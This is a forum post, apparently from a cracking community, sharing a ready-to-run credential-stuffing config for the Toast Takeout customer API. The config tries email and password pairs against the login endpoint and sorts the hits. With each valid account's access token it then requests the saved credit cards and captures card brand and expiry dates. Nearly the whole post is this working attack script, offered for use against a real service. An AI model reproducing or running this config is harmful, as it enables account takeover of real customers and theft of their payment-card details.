• Register now to get access to thousands of Tutorials, Leaked content, Hot NSFW and much more. Join us as we build and grow the community.

Advertise Here

Advertise Here

Advertise Here

Toast Takeout + CAP

Gpious

Sponsorship Deal Closer
G Rep
0
0
0
Rep
0
G Vouches
0
0
0
Vouches
0
Posts
176
Likes
173
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 2 800 XP
Posting this because @https://cracked.to/Tmgplays1 sucks and couldnt do it himself
Code:
Code:
REQUEST POST "https://ws-api.toasttab.com/customermgmt/v1/auth/login"
CONTENT "email=<USER>&password=<PASS>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "Host: ws-api.toasttab.com"
HEADER "Origin: https://localhost:8443"
HEADER "Accept: application/json"
HEADER "User-Agent: OrderAhead/1.37 (com.toasttab.consumer; build:118; iOS 13.5.0) Alamofire/5.0.0"
HEADER "Accept-Language: en-US;q=1.0"
HEADER "Accept-Encoding: br;q=1.0, gzip;q=0.9, deflate;q=0.8"
KEYCHECK
KEYCHAIN Failure OR
KEY "<RESPONSECODE>" EqualTo "401"
KEYCHAIN Success OR
KEY "accessJwt"
KEYCHAIN Ban OR
KEY "<RESPONSECODE>" EqualTo "403"
KEY "<RESPONSECODE>" Contains "502"
PARSE "<SOURCE>" JSON "customerGuid" CreateEmpty=FALSE -> VAR "GUID"
PARSE "<SOURCE>" JSON "accessJwt" CreateEmpty=FALSE -> VAR "accessJwt"
REQUEST GET "https://ws-api.toasttab.com/customermgmt/v1/customers/<GUID>/creditcards"
HEADER "Host: ws-api.toasttab.com"
HEADER "Origin: https://localhost:8443"
HEADER "Accept: application/json"
HEADER "User-Agent: OrderAhead/1.37 (com.toasttab.consumer; build:118; iOS 13.5.0) Alamofire/5.0.0"
HEADER "toast-customer-access: "
HEADER "Accept-Language: en-US;q=1.0"
HEADER "Accept-Encoding: br;q=1.0, gzip;q=0.9, deflate;q=0.8"
KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Custom "FREE" OR
KEY "[]"
PARSE "<SOURCE>" JSON "cardBrand" Recursive=TRUE CreateEmpty=FALSE -> CAP "CARD"
PARSE "<SOURCE>" JSON "expirationMonth" Recursive=TRUE CreateEmpty=FALSE -> CAP "EXPMONTH"
PARSE "<SOURCE>" JSON "expirationYear" Recursive=TRUE CreateEmpty=FALSE -> CAP "EXPYEAR"
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

452,508

356,407

356,420

Top